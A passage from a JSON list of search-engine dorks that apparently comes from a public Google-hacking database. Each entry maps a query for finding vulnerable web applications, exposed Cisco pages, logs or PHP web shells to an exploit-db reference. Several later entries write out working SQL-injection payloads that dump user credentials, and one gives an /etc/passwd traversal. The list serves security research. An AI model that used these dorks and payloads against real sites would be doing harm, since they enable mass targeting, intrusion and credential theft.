"Php-Stats 0.1.9.1b (php-stats-options.php) admin 2 exec() - CVE: 2006-7173: http://www.exploit-db.com/exploits/3502", "submited": "2010-11-15", "request": "inurl:php-stats.js.php", "id": 3483}, {"short description": "\"Powered by MercuryBoard\"", "long description": "MercuryBoard 1.1.4 (User-Agent) Remote SQL Injection: http://www.exploit-db.com/exploits/2247", "submited": "2010-11-15", "request": "\"Powered by MercuryBoard\"", "id": 3484}, {"short description": "\"Powered by Drake CMS\" inurl:index.php?option=guestbook", "long description": "Drake CMS 0.4.11 Remote Blind SQL Injection - CVE: 2008-6475: http://www.exploit-db.com/exploits/5391", "submited": "2010-11-15", "request": "\"Powered by Drake CMS\" inurl:index.php?option=guestbook", "id": 3485}, {"short description": 
"\"Driven by DokuWiki\"", "long description": "DokuWiki 2006-03-09b (dwpage.php) Remote Code Execution: http://www.exploit-db.com/exploits/2321", "submited": "2010-11-15", "request": "\"Driven by DokuWiki\"", "id": 3486}, {"short description": "\"powered by php update\"", "long description": "PHP-Update 2.7 (admin/uploads.php) Remote Code Execution - CVE: 2006-6878: http://www.exploit-db.com/exploits/3020", "submited": "2010-11-15", "request": "\"powered by php update\"", "id": 3487}, {"short description": "\"powered by jaws\" | \"powered by the jaws project\" | inurl:?gadget=search", "long description": "Jaws 0.6.2 (Search gadget) Remote SQL Injection - CVE: 2006-3292: http://www.exploit-db.com/exploits/1946/", "submited": "2010-11-15", "request": "\"powered by jaws\" | \"powered by the jaws project\" | inurl:?gadget=search", "id": 3488}, {"short description": "Realizzato utilizzando Web Portal", "long description": "WebPortal CMS 0.6-beta Remote Password Change - CVE: 2008-0142: http://www.exploit-db.com/exploits/4835", "submited": "2010-11-15", "request": "Realizzato utilizzando Web Portal", "id": 3489}, {"short description": "\"powered by ILIAS\"", "long description": "ILIAS LMS 3.9.9/3.10.7 Arbitrary Edition/Info Disclosure Vulns: http://www.exploit-db.com/exploits/9151", "submited": "2010-11-15", "request": "\"powered by ILIAS\"", "id": 3491}, {"short description": "\"This site is powered by CMS Made Simple\"", "long description": "CMS Made Simple 1.2.4 (FileManager module) File Upload - CVE: 2008-2267: http://www.exploit-db.com/exploits/5600", "submited": "2010-11-15", "request": "\"This site is powered by CMS Made Simple\"", "id": 3493}, {"short description": "\"FlatNuke\" \"Valid HTML 4.01!\" \"Valid CSS!\" \"Get RSS 2.0 Feed\" \"Get RSS", "long description": "Flatnuke 2.5.8 file() Priv Escalation / Code Execution: http://www.exploit-db.com/exploits/2498", "submited": "2010-11-15", "request": "\"FlatNuke\" \"Valid HTML 4.01!\" \"Valid CSS!\" \"Get RSS 2.0 
Feed\" \"Get RSS", "id": 3494}, {"short description": "\"Powered by BLOG:CMS\"|\"Powered by blogcms.com\"|\"2003-2004, Radek Hulan\"", "long description": "BLOG:CMS 4.0.0k Remote SQL Injection - CVE: 2006-3364: http://www.exploit-db.com/exploits/1960", "submited": "2010-11-15", "request": "\"Powered by BLOG:CMS\"|\"Powered by blogcms.com\"|\"2003-2004, Radek Hulan\"", "id": 3495}, {"short description": "Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS . Back to top", "long description": "Nucleus CMS 3.22 (DIR_LIBS) Arbitrary Remote Inclusion - CVE: 2006-2583: http://www.exploit-db.com/exploits/1816", "submited": "2010-11-15", "request": "Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS . Back to top", "id": 3496}, {"short description": "\"by eXtreme Crew\"", "long description": "extreme-fusion 4.02 Remote Code Execution: http://www.exploit-db.com/exploits/2937", "submited": "2010-11-15", "request": "\"by eXtreme Crew\"", "id": 3497}, {"short description": "\"2007 Rafal Kucharski\"", "long description": "RTWebalbum 1.0.462 (AlbumID) Blind SQL Injection - CVE: 2009-1910: http://www.exploit-db.com/exploits/8648", "submited": "2010-11-15", "request": "\"2007 Rafal Kucharski\"", "id": 3498}, {"short description": "\"This forum powered by Phorum.\"", "long description": "Phorum 5 (pm.php) Arbitrary Local Inclusion - CVE: 2006-3611: http://www.exploit-db.com/exploits/2008", "submited": "2010-11-15", "request": "\"This forum powered by Phorum.\"", "id": 3499}, {"short description": "\"is proudly powered by WordPress\"", "long description": "Wordpress 2.0.6 wp-trackback.php Remote SQL Injection - CVE: 2007-0233: http://www.exploit-db.com/exploits/3109", "submited": "2010-11-15", "request": "\"is proudly powered by WordPress\"", "id": 3500}, {"short description": "\"Powered by Burning Board Lite 1.0.2 * 2001-2004\"", "long description": "Woltlab Burning Board Lite 1.0.2 Blind SQL Injection: http://www.exploit-db.com/exploits/2842", 
"submited": "2010-11-15", "request": "\"Powered by Burning Board Lite 1.0.2 * 2001-2004\"", "id": 3501}, {"short description": "FhImage, powered by Flash-here.com", "long description": "Fhimage 1.2.1 Remote Command Execution: http://www.exploit-db.com/exploits/7821", "submited": "2010-11-15", "request": "FhImage, powered by Flash-here.com", "id": 3502}, {"short description": "\"FlatNuke\" \"Valid HTML 4.01!\" \"Valid CSS!\" \"Get RSS 2.0 Feed\" \"Get RSS", "long description": "Flatnuke 2.5.8 (userlang) Local Inclusion / Delete All Users: http://www.exploit-db.com/exploits/2499", "submited": "2010-11-15", "request": "\"FlatNuke\" \"Valid HTML 4.01!\" \"Valid CSS!\" \"Get RSS 2.0 Feed\" \"Get RSS", "id": 3503}, {"short description": "\"powered by blur6ex\"", "long description": "blur6ex 0.3.462 (ID) Admin Disclosure / Blind SQL Injection - CVE: 2006-3065: http://www.exploit-db.com/exploits/1904", "submited": "2010-11-15", "request": "\"powered by blur6ex\"", "id": 3504}, {"short description": "\"Powered by Claroline\" -demo", "long description": "Claroline 1.7.4 (scormExport.inc.php) Remote Code Execution: http://www.exploit-db.com/exploits/1627", "submited": "2010-11-15", "request": "\"Powered by Claroline\" -demo", "id": 3505}, {"short description": "\"Powered by Burning Board Lite 1.0.2 * 2001-2004\"", "long description": "Woltlab Burning Board Lite 1.0.2 decode_cookie() SQL Injection - CVE: 2006-6237: http://www.exploit-db.com/exploits/2841", "submited": "2010-11-15", "request": "\"Powered by Burning Board Lite 1.0.2 * 2001-2004\"", "id": 3508}, {"short description": "\"Personal .NET Portal\"", "long description": "Personal.Net Portal Multiple Vulnerabilities: http://www.exploit-db.com/exploits/15067", "submited": "2010-11-15", "request": "\"Personal .NET Portal\"", "id": 3510}, {"short description": "\"SmodBIP\" & \"Aktualno.ci\"", "long description": "SmodBIP 1.06 (aktualnosci zoom) Remote SQL Injection - CVE: 2007-1920: 
http://www.exploit-db.com/exploits/3678", "submited": "2010-11-15", "request": "\"SmodBIP\" & \"Aktualno.ci\"", "id": 3511}, {"short description": "\"SmodCMS\" & \"S.ownik\"", "long description": "SmodCMS 2.10 (Slownik ssid) Remote SQL Injection - CVE: 2007-1931: http://www.exploit-db.com/exploits/3679", "submited": "2010-11-15", "request": "\"SmodCMS\" & \"S.ownik\"", "id": 3512}, {"short description": "\"is a product of Lussumo\"", "long description": "Vanilla 1.1.3 Remote Blind SQL Injection - CVE: 2007-5643: http://www.exploit-db.com/exploits/4548", "submited": "2010-11-15", "request": "\"is a product of Lussumo\"", "id": 3513}, {"short description": "inurl:\"index.php?name=PNphpBB2\"", "long description": "PNphpBB2 1.2 (index.php c) Remote SQL Injection - CVE: 2007-3052: http://www.exploit-db.com/exploits/4026", "submited": "2010-11-15", "request": "inurl:\"index.php?name=PNphpBB2\"", "id": 3514}, {"short description": "\"propulse par DotClear\" \"fil atom\" \"fil rss\" +commentaires", "long description": "DotClear 1.2.4 (prepend.php) Arbitrary Remote Inclusion - CVE: 2006-2866: http://www.exploit-db.com/exploits/1869", "submited": "2010-11-15", "request": "\"propulse par DotClear\" \"fil atom\" \"fil rss\" +commentaires", "id": 3515}, {"short description": "\"Powered by Online Grades\"", "long description": "Online Grades & Attendance 3.2.6 Credentials Changer SQL injection: http://www.exploit-db.com/exploits/8843", "submited": "2010-11-15", "request": "\"Powered by Online Grades\"", "id": 3516}, {"short description": "\"Powered by PHP Photo Album\"", "long description": "phpAlbum", "submited": "2010-11-15", "request": "\"Powered by PHP Photo Album\"", "id": 3517}, {"short description": "\"Powered by ClanTiger\"", "long description": "ClanTiger 1.1.1 Multiple Cookie Handling Vulnerabilities: http://www.exploit-db.com/exploits/8471", "submited": "2010-11-15", "request": "\"Powered by ClanTiger\"", "id": 3518}, {"short description": "\"Site powered by GuppY\" | 
\"Site cree avec GuppY\" +inurl:lng=", "long description": "GuppY 4.5.16 Remote Commands Execution - CVE: 2007-0639: http://www.exploit-db.com/exploits/3221", "submited": "2010-11-15", "request": "\"Site powered by GuppY\" | \"Site cree avec GuppY\" +inurl:lng=", "id": 3519}, {"short description": "\"powered by php photo album\" -demo2 -pitanje\"", "long description": "PHP Album 0.3.2.3 Remote Command Execution: http://www.exploit-db.com/exploits/1678", "submited": "2010-11-15", "request": "\"powered by php photo album\" -demo2 -pitanje\"", "id": 3520}, {"short description": "inurl:/modules/lykos_reviews/", "long description": "XOOPS Module Lykos Reviews 1.00 (index.php) SQL Injection - CVE: 2007-1817: http://www.exploit-db.com/exploits/3618", "submited": "2010-11-15", "request": "inurl:/modules/lykos_reviews/", "id": 3521}, {"short description": "\"Powered By X7 Chat\"", "long description": "X7 Chat 2.0.4 (old_prefix) Remote Blind SQL Injection - CVE: 2006-3851: http://www.exploit-db.com/exploits/2068", "submited": "2010-11-15", "request": "\"Powered By X7 Chat\"", "id": 3522}, {"short description": "\"powered by guestbook script\"", "long description": "GuestBook Script 1.7 (include_files) Remote Code Execution: http://www.exploit-db.com/exploits/1575", "submited": "2010-11-15", "request": "\"powered by guestbook script\"", "id": 3524}, {"short description": "index.php?option=com_ezine", "long description": "Joomla Component D4JeZine 2.8 Remote BLIND SQL Injection - CVE: 2007-1776: http://www.exploit-db.com/exploits/3590", "submited": "2010-11-15", "request": "index.php?option=com_ezine", "id": 3525}, {"short description": "\"This site is powered by e107\"|inurl:e107_plugins|e107_handlers|e107_files", "long description": "e107 0.75 (GLOBALS Overwrite) Remote Code Execution: http://www.exploit-db.com/exploits/2268", "submited": "2010-11-15", "request": "\"This site is powered by e107\"|inurl:e107_plugins|e107_handlers|e107_files", "id": 3526}, {"short 
description": "inurl:/modules/xfsection/", "long description": "XOOPS Module XFsection 1.07 (articleid) BLIND SQL Injection - CVE: 2005-0725: http://www.exploit-db.com/exploits/3645", "submited": "2010-11-15", "request": "inurl:/modules/xfsection/", "id": 3529}, {"short description": "inurl:\"phpwcms/index.php?id=\"", "long description": "phpwcms 1.2.6 (Cookie: wcs_user_lang) Local File Include: http://www.exploit-db.com/exploits/2758", "submited": "2010-11-15", "request": "inurl:\"phpwcms/index.php?id=\"", "id": 3530}, {"short description": "intext:\"This site is using phpGraphy\" | intitle:\"my phpgraphy site\"", "long description": "PHPGraphy 0.9.12 Privilege Escalation / Commands Execution: http://www.exploit-db.com/exploits/2867", "submited": "2010-11-15", "request": "intext:\"This site is using phpGraphy\" | intitle:\"my phpgraphy site\"", "id": 3531}, {"short description": "\"Copyright Devellion Limited 2005. All rights reserved.\"", "long description": "CubeCart 3.0.11 (oid) Remote Blind SQL Injection - CVE: 2006-4267: http://www.exploit-db.com/exploits/2198", "submited": "2010-11-15", "request": "\"Copyright Devellion Limited 2005. 
All rights reserved.\"", "id": 3532}, {"short description": "inurl:/modules/debaser/", "long description": "XOOPS Module debaser 0.92 (genre.php) BLIND SQL Injection- CVE: 2007-1805: http://www.exploit-db.com/exploits/3630", "submited": "2010-11-15", "request": "inurl:/modules/debaser/", "id": 3533}, {"short description": "\"Powered by Quick.Cms\"", "long description": "Quick.Cms.Lite 0.3 (Cookie sLanguage) Local File Include - CVE: 2006-5834: http://www.exploit-db.com/exploits/2719", "submited": "2010-11-15", "request": "\"Powered by Quick.Cms\"", "id": 3534}, {"short description": "inurl:/modules/rmgallery/", "long description": "XOOPS Module RM+Soft Gallery 1.0 BLIND SQL Injection - CVE: 2007-1806: http://www.exploit-db.com/exploits/3633", "submited": "2010-11-15", "request": "inurl:/modules/rmgallery/", "id": 3535}, {"short description": "intext:\"2000-2001 The phpHeaven Team\"", "long description": "phpMyChat 0.14.5 (SYS enter) Remote Code Execution: http://www.exploit-db.com/exploits/1646", "submited": "2010-11-15", "request": "intext:\"2000-2001 The phpHeaven Team\"", "id": 3536}, {"short description": "\"Basado en Spirate\"", "long description": "Small Pirate v-2.1 (XSS/SQL) Multiple Remote Vulnerabilities - CVE: 2009-4936: http://www.exploit-db.com/exploits/8819", "submited": "2010-11-15", "request": "\"Basado en Spirate\"", "id": 3537}, {"short description": "inurl:\"lists/?p=subscribe\" | inurl:\"lists/index.php?p=subscribe\"", "long description": "PHPList 2.10.2 GLOBALS[] Remote Code Execution: http://www.exploit-db.com/exploits/1659", "submited": "2010-11-15", "request": "inurl:\"lists/?p=subscribe\" | inurl:\"lists/index.php?p=subscribe\"", "id": 3538}, {"short description": "\"Barbecued by sNews\"", "long description": "sNews 1.5.30 Remote Reset Admin Pass / Command Exec Exploit - CVE: 2007-0261: http://www.exploit-db.com/exploits/3116", "submited": "2010-11-15", "request": "\"Barbecued by sNews\"", "id": 3539}, {"short description": 
"inurl:\"printable_pedigree.php\"", "long description": "Dog Pedigree Online Database 1.0.1b Blind SQL Injection: http://www.exploit-db.com/exploits/8740", "submited": "2010-11-15", "request": "inurl:\"printable_pedigree.php\"", "id": 3540}, {"short description": "\"powered by discuz!", "long description": "Discuz! 4.x SQL Injection / Admin Credentials Disclosure: http://www.exploit-db.com/exploits/2859", "submited": "2010-11-15", "request": "\"powered by discuz!", "id": 3542}, {"short description": "\"This web site was made with PostNuke\"", "long description": "PostNuke 0.763 (PNSV lang) Remote Code Execution - CVE: 2006-5733: http://www.exploit-db.com/exploits/2707", "submited": "2010-11-15", "request": "\"This web site was made with PostNuke\"", "id": 3543}, {"short description": "\"Powered by Shop-Script FREE\"", "long description": "Shop-Script FREE 2.0 Remote Command Execution - CVE: 2007-4932: http://www.exploit-db.com/exploits/4419/", "submited": "2010-11-15", "request": "\"Powered by Shop-Script FREE\"", "id": 3544}, {"short description": "\"LinPHA Version 1.3.x\" or \"The LinPHA developers\"", "long description": "LinPHA 1.3.1 (new_images.php) Remote Blind SQL Injection - CVE: 2007-4053: http://www.exploit-db.com/exploits/4242/", "submited": "2010-11-15", "request": "\"LinPHA Version 1.3.x\" or \"The LinPHA developers\"", "id": 3545}, {"short description": "\"powered by Quick.Cart\"", "long description": "Quick.Cart 2.0 (actions_client/gallery.php) Local File Include:http://www.exploit-db.com/exploits/2769", "submited": "2010-11-15", "request": "\"powered by Quick.Cart\"", "id": 3546}, {"short description": "\"Powered by PHP-Update\" -site:www.php-update.co.uk", "long description": "PHP-Update 2.7 Multiple Remote Vulnerabilities - CVE: 2006-6879:http://www.exploit-db.com/exploits/3017", "submited": "2010-11-15", "request": "\"Powered by PHP-Update\" -site:www.php-update.co.uk", "id": 3549}, {"short description": "intext:\"2000-2001 The phpHeaven Team\" 
-sourceforge", "long description": "phpMyChat 0.15.0dev (SYS enter) Remote Code Execution:http://www.exploit-db.com/exploits/1647", "submited": "2010-11-15", "request": "intext:\"2000-2001 The phpHeaven Team\" -sourceforge", "id": 3550}, {"short description": "\"Powered by MercuryBoard\"", "long description": "MercuryBoard 1.1.5 (login.php) Remote Blind SQL Injection - CVE: 2008-6632:http://www.exploit-db.com/exploits/5653", "submited": "2010-11-15", "request": "\"Powered by MercuryBoard\"", "id": 3551}, {"short description": "\"Powered by Coppermine Photo Gallery\"", "long description": "Coppermine Photo Gallery 1.4.18 LFI / Remote Code Execution - CVE: 2008-3481:http://www.exploit-db.com/exploits/6178", "submited": "2010-11-15", "request": "\"Powered by Coppermine Photo Gallery\"", "id": 3552}, {"short description": "\"Content managed by the Etomite Content Management System\"", "long description": "Etomite CMS 0.6.1 (username) SQL Injection - CVE: 2006-3904:http://www.exploit-db.com/exploits/2071", "submited": "2010-11-15", "request": "\"Content managed by the Etomite Content Management System\"", "id": 3555}, {"short description": "\"powered by PCPIN.com\"", "long description": "PCPIN Chat 5.0.4 (login/language) Remote Code Execution:http://www.exploit-db.com/exploits/1697", "submited": "2010-11-15", "request": "\"powered by PCPIN.com\"", "id": 3556}, {"short description": "\"Powered by Leap\"", "long description": "Leap CMS 0.1.4 (searchterm) Blind SQL Injection - CVE: 2009-1613:http://www.exploit-db.com/exploits/8576", "submited": "2010-11-15", "request": "\"Powered by Leap\"", "id": 3557}, {"short description": "inurl:\"option=com_tophotelmodule\"", "long description": "CVE: 2009-3368EDB-ID:This search potentially exposes Joomla Hotel Booking System XSS/SQL Injection Vulnerabilities", "submited": "2010-11-15", "request": "inurl:\"option=com_tophotelmodule\"", "id": 3558}, {"short description": "\"Runcms Copyright\" \"2002 - 2007\" +\"page created\"", "long 
description": "RunCms 1.5.2 (debug_show.php) Remote SQL Injection - CVE: 2007-2539:http://www.exploit-db.com/exploits/3850", "submited": "2010-11-15", "request": "\"Runcms Copyright\" \"2002 - 2007\" +\"page created\"", "id": 3563}, {"short description": "\"Powered by eXV2 Vers\"", "long description": "exV2 2.0.4.3 extract() Remote Command Execution - CVE: 2006-7080:http://www.exploit-db.com/exploits/2415", "submited": "2010-11-15", "request": "\"Powered by eXV2 Vers\"", "id": 3566}, {"short description": "\"Betrieben mit Serendipity 1.0.3\"", "long description": "Serendipity 1.0.3 (comment.php) Local File Include - CVE: 2006-6242:http://www.exploit-db.com/exploits/2869", "submited": "2010-11-15", "request": "\"Betrieben mit Serendipity 1.0.3\"", "id": 3567}, {"short description": "\"Powered by XMB\"", "long description": "XMB 1.9.6 Final basename() Remote Command Execution - CVE: 2006-4191:http://www.exploit-db.com/exploits/2178", "submited": "2010-11-15", "request": "\"Powered by XMB\"", "id": 3569}, {"short description": "\"Powered by BIGACE 2.5\"", "long description": "BIGACE CMS 2.5 (username) Remote SQL Injection - CVE: 2009-1778:http://www.exploit-db.com/exploits/8664", "submited": "2010-11-15", "request": "\"Powered by BIGACE 2.5\"", "id": 3571}, {"short description": "allintitle: powered by DeluxeBB", "long description": "DeluxeBB 1.2 Multiple Remote Vulnerabilities - CVE: 2008-2195:http://www.exploit-db.com/exploits/5550", "submited": "2010-11-15", "request": "allintitle: powered by DeluxeBB", "id": 3573}, {"short description": "\"Powered by Online Grades\"", "long description": "Online Grades & Attendance 3.2.6 Blind SQL Injection - CVE: 2009-2598:http://www.exploit-db.com/exploits/8854", "submited": "2010-11-15", "request": "\"Powered by Online Grades\"", "id": 3574}, {"short description": "\"Powered by ClanTiger\"", "long description": "ClanTiger 1.1.1 (slug) Blind SQL Injection: http://www.exploit-db.com/exploits/8473", "submited": "2010-11-15", 
"request": "\"Powered by ClanTiger\"", "id": 3576}, {"short description": "\"AlumniServer project\"", "long description": "AlumniServer 1.0.1 (resetpwemail) Blind SQL Injection: http://www.exploit-db.com/exploits/9020", "submited": "2010-11-15", "request": "\"AlumniServer project\"", "id": 3577}, {"short description": "\"Powered by sendcard - an advanced PHP e-card program\"", "long description": "SendCard 3.4.0 Unauthorized Administrative Access: http://www.exploit-db.com/exploits/2117", "submited": "2010-11-15", "request": "\"Powered by sendcard - an advanced PHP e-card program\"", "id": 3579}, {"short description": "inurl:imageview5", "long description": "Imageview 5 (Cookie/index.php) Remote Local Include - CVE: 2006-5554:http://www.exploit-db.com/exploits/2647", "submited": "2010-11-15", "request": "inurl:imageview5", "id": 3580}, {"short description": "\"This site is powered by e107\"", "long description": "TikiWiki 1.9 Sirius (jhot.php) Remote Command Execution - CVE: 2006-4602:http://www.exploit-db.com/exploits/2711", "submited": "2010-11-15", "request": "\"This site is powered by e107\"", "id": 3581}, {"short description": "\"powered by tikiwiki\"", "long description": "TikiWiki 1.9 Sirius (jhot.php) Remote Command Execution - CVE: 2006-4602:http://www.exploit-db.com/exploits/2288", "submited": "2010-11-15", "request": "\"powered by tikiwiki\"", "id": 3582}, {"short description": "\"This is a Free & Open Source mailing list manager\"", "long description": "Open Newsletter", "submited": "2010-11-15", "request": "\"This is a Free & Open Source mailing list manager\"", "id": 3584}, {"short description": "intitle:\"X7 Chat Help Center\"|\"Powered By X7 Chat\"", "long description": "X7 Chat 2.0 (help_file) Remote Commands Execution - CVE: 2006-2156:http://www.exploit-db.com/exploits/1738", "submited": "2010-11-15", "request": "intitle:\"X7 Chat Help Center\"|\"Powered By X7 Chat\"", "id": 3585}, {"short description": "\"powered by gcards\"", "long description": 
"gCards 1.45 Multiple Vulnerabilities - CVE: 2006-1346:http://www.exploit-db.com/exploits/1595", "submited": "2010-11-15", "request": "\"powered by gcards\"", "id": 3586}, {"short description": "pixelpost \"RSS 2.0\" \"ATOM feed\" \"Valid xHTML / Valid CSS\"", "long description": "Pixelpost 1-5rc1-2 Remote Privilege Escalation Exploit - CVE: 2006-2889:http://www.exploit-db.com/exploits/1868", "submited": "2010-11-15", "request": "pixelpost \"RSS 2.0\" \"ATOM feed\" \"Valid xHTML / Valid CSS\"", "id": 3587}, {"short description": "\"This web site was made with MD-Pro\"", "long description": "CVE: 2006-7112EDB-ID: 2712This search can potentially identify vulnerable installations of MD-Pro, a web portal system written in PHP.", "submited": "2010-11-15", "request": "\"This web site was made with MD-Pro\"", "id": 3589}, {"short description": "\"Powered by XMB\"", "long description": "CVE: 2006-3994EDB-ID: 2105This search can potentially identify vulnerable installations of XMB", "submited": "2010-11-15", "request": "http://www.google.com/search?q=\"Powered+by+XMB\"", "id": 3590}, {"short description": "\"powered by ThWboard\"", "long description": "CVE: 2007-0340EDB-ID: 3124This search can potentially identify vulnerable installations of ThWboard.", "submited": "2010-11-15", "request": "\"powered by ThWboard\"", "id": 3591}, {"short description": "\"Page created in\" \"seconds by glFusion\" +RSS", "long description": "CVE: 2009-1281EDB-ID: 8347This search can potentially identify vulnerable installations of glFusion.http://www.exploit-db.com/exploits/8347", "submited": "2010-11-15", "request": "\"Page created in\" \"seconds by glFusion\" +RSS", "id": 3592}, {"short description": "inurl:wp-login.php Register Username Password -echo", "long description": "CVE: 2006-2667EDB-ID: 6This search can potentially identify vulnerable installations of WordPress.", "submited": "2010-11-15", "request": "inurl:wp-login.php Register Username Password -echo", "id": 3593}, {"short 
description": "\"this site is using the webspell script (version: 4.01.02)\"", "long description": "CVE: 2007-0502EDB-ID: 3172This search can potentially identify vulnerable installations of webSPELL 4.01.02", "submited": "2010-11-15", "request": "\"this site is using the webspell script (version: 4.01.02)\"", "id": 3594}, {"short description": "insite: SmarterMail Enterprise 7.1", "long description": "http://www.exploit-db.com/exploits/15185", "submited": "2010-11-15", "request": "SmarterMail Enterprise 7.1", "id": 3595}, {"short description": "inurl:\"com_sqlreport\"", "long description": "Joomla Component user_id com_sqlreport Blind SQL Injection Vulnerability - CVE: 2010-0753: http://www.exploit-db.com/exploits/11549", "submited": "2010-11-15", "request": "inurl:\"com_sqlreport\"", "id": 3596}, {"short description": "\"Powered by Quick.Cart\"", "long description": "Quick.Cart 2.2 RFI/LFI Remote Code Execution Exploit - CVE: 2007-3138: http://www.exploit-db.com/exploits/4025", "submited": "2010-11-15", "request": "\"Powered by Quick.Cart\"", "id": 3598}, {"short description": "\"Powered by Shadowed Portal\"", "long description": "Shadowed Portal 5.7d3 Remote Command Execution Exploit: http://www.exploit-db.com/exploits/4768", "submited": "2010-11-15", "request": "\"Powered by Shadowed Portal\"", "id": 3599}, {"short description": "\"powered by bitweaver\"", "long description": "bitweaver 1.3 (tmpImagePath) Attachment mod_mime Exploit - CVE: 2006-3105: http://www.exploit-db.com/exploits/1918", "submited": "2010-11-15", "request": "\"powered by bitweaver\"", "id": 3600}, {"short description": "inurl:\"index.php?ind=blog\"", "long description": "MKPortal 1.2.1 Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/7796/", "submited": "2010-11-15", "request": "inurl:\"index.php?ind=blog\"", "id": 3601}, {"short description": "(\"powered by nocc\" intitle:\"NOCC Webmail\") -site:sourceforge.net -Zoekinalles.nl -analysis", "long description": "NOCC 
Webmail 1.0 (Local Inclusion) Remote Code Execution Exploit - CVE: 2006-0891: http://www.exploit-db.com/exploits/1522/", "submited": "2010-11-15", "request": "(\"powered by nocc\" intitle:\"NOCC Webmail\") -site:sourceforge.net -Zoekinalles.nl -analysis", "id": 3603}, {"short description": "inurl:\"jscripts/tiny_mce/plugins/tinybrowser/\"", "long description": "inurl:\"jscripts/tiny_mce/plugins/tinybrowser/\"or refinedinurl:\"jscripts/tiny_mce/plugins/tinybrowser/\" \"index of\"Various \"tinybrowser\" vulnerabilities:http://www.exploit-db.com/exploits/9296/DigiP", "submited": "2010-11-18", "request": "inurl:\"jscripts/tiny_mce/plugins/tinybrowser/\"", "id": 3609}, {"short description": "inurl:/level/15/exec/-/configure/http", "long description": "Default Cisco 2800 Series page", "submited": "2010-11-21", "request": "inurl:/level/15/exec/-/configure/http", "id": 3610}, {"short description": "inurl:/exec/show/tech-support/cr", "long description": "Default Cisco 2800 Series page", "submited": "2010-11-21", "request": "inurl:/exec/show/tech-support/cr", "id": 3611}, {"short description": "inurl:/level/15/exec/-", "long description": "Default Cisco 2800 Series page", "submited": "2010-11-21", "request": "inurl:/level/15/exec/-", "id": 3612}, {"short description": "inurl:\"?delete\" +intext:\"PHP version\" +intext:\"Safe_mode\"", "long description": "Matches some well known phpshells (r57 and the like).", "submited": "2010-11-24", "request": "inurl:\"?delete\" +intext:\"PHP version\" +intext:\"Safe_mode\"", "id": 3614}, {"short description": "inurl:\"?act=phpinfo\"", "long description": "Match some well known phpshells (c99 and ironwarez and the like).", "submited": "2010-11-24", "request": "inurl:\"?act=phpinfo\"", "id": 3615}, {"short description": "\"Site produced by GeneralProducts.co.uk\"", "long description": "GeneralProducts (index.php?page=) Local File Inclusion Vulnerabilityhttp://server/index.php?page=../../../../../../etc/passwdNet.Edit0r - 
black.hat.tm@gmail.com", "submited": "2010-11-25", "request": "\"Site produced by GeneralProducts.co.uk\"", "id": 3616}, {"short description": "inurl:\"index.php?option=com_jeajaxeventcalendar\"", "long description": "Joomla JE Ajax Event Calendar Component (com_jeajaxeventcalendar) SQL Injection Vulnerability Author: altbta", "submited": "2010-11-25", "request": "inurl:\"index.php?option=com_jeajaxeventcalendar\"", "id": 3617}, {"short description": "\"Powered by SiteEngine\"", "long description": "SiteEngine 7.1 SQL injection Vulnerability: http://www.exploit-db.com/exploits/15612", "submited": "2010-11-25", "request": "\"Powered by SiteEngine\"", "id": 3618}, {"short description": "filetype: log inurl:\"access.log\" +intext:\"HTTP/1.1\"", "long description": "Match some apache access.log files.Author: susmab", "submited": "2010-11-25", "request": "filetype: log inurl:\"access.log\" +intext:\"HTTP/1.1\"", "id": 3619}, {"short description": "inurl:\"index.php?option=com_competitions\"", "long description": "SQL Injection: http://127.0.0.1/index.php?option=com_competitions&task=view&id=-9 union all select 1,2,3,4,group_concat(username,0x3a,email,0x3a,password),6,7 from jos_users-- and XSS: http://127.0.0.1/index.php?option=com_competitions&menu=XroGuE Author: Ashiyane Digital Security Team", "submited": "2010-11-25", "request": "inurl:\"index.php?option=com_competitions\"", "id": 3620}, {"short description": "inurl:\"index.php?option=com_storedirectory\"", "long description": "SQL Injection Vulnerability: http://127.0.0.1/index.php?option=com_storedirectory&task=view&id=-16 UNION SELECT 1,2,concat_ws(0x3a,username,email,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from jos_usersAuthor: Ashiyane Digital Security Team", "submited": "2010-11-25", "request": "inurl:\"index.php?option=com_storedirectory\"", "id": 3621}, {"short description": "inurl:\"index.php?option=com_catalogue\"", "long description": "Author: Ashiyane Digital Security Team SQL Injection: 
http://server/index.php?option=com_catalogue&Itemid=73&cat_id=-999 union select 1,version(),user(),4,5,6", "submited": "2010-11-25", "request": "inurl:\"index.php?option=com_catalogue\"", "id": 3622}, {"short description": "inurl:index.php?option=com_doqment&cid=", "long description": "Author: KedAns-Dz http://server/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--", "submited": "2010-11-25", "request": "inurl:index.php?option=com_doqment&cid=", "id": 3623}, {"short description": "inurl:\"index.php?option=com_annuaire\"", "long description": "SQL Injection Vulnerability:[+] vuln: http://127.0.0.1/index.php?option=com_annuaire&view=annuaire&type=cat&id=[SQLi][+] Exploit: /**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users--Submitter: Ashiyane Digital Security Team", "submited": "2010-12-01", "request": "inurl:\"index.php?option=com_annuaire\"", "id": 3624}, {"short description": "\"Powered By Dejcom Market CMS\"", "long description": "Submitter:Mormoroth PoC: http://server/showbrand.aspx?bc=%27 or 1=(select top 1 table_name from information_schema.tables where table_name not in('bill','billdetail','cart','charge'))--", "submited": "2010-12-04", "request": "\"Powered By Dejcom Market CMS\"", "id": 3625}, {"short description": "php Kolay Forum (php KF) 2007 - 2010 phpKF Ekibi", "long description": "Submitter: FreWaL CSRF Vulnerability: http://www.exploit-db.com/exploits/15685", "submited": "2010-12-05", "request": "php Kolay Forum (php KF) 2007 - 2010 phpKF Ekibi", "id": 3626}, {"short description": "\"SOOP Portal 2.0\"", "long description": "Submitted by: Net.Edit0r Shell Upload: http://www.exploit-db.com/exploits/15690", "submited": "2010-12-05", "request": "\"SOOP Portal 2.0\"", "id": 3627}, {"short description": "inurl:index.php?option=com_lqm \"showResults\"", "long description": "Submitter: Snakespc SQL Injection: 
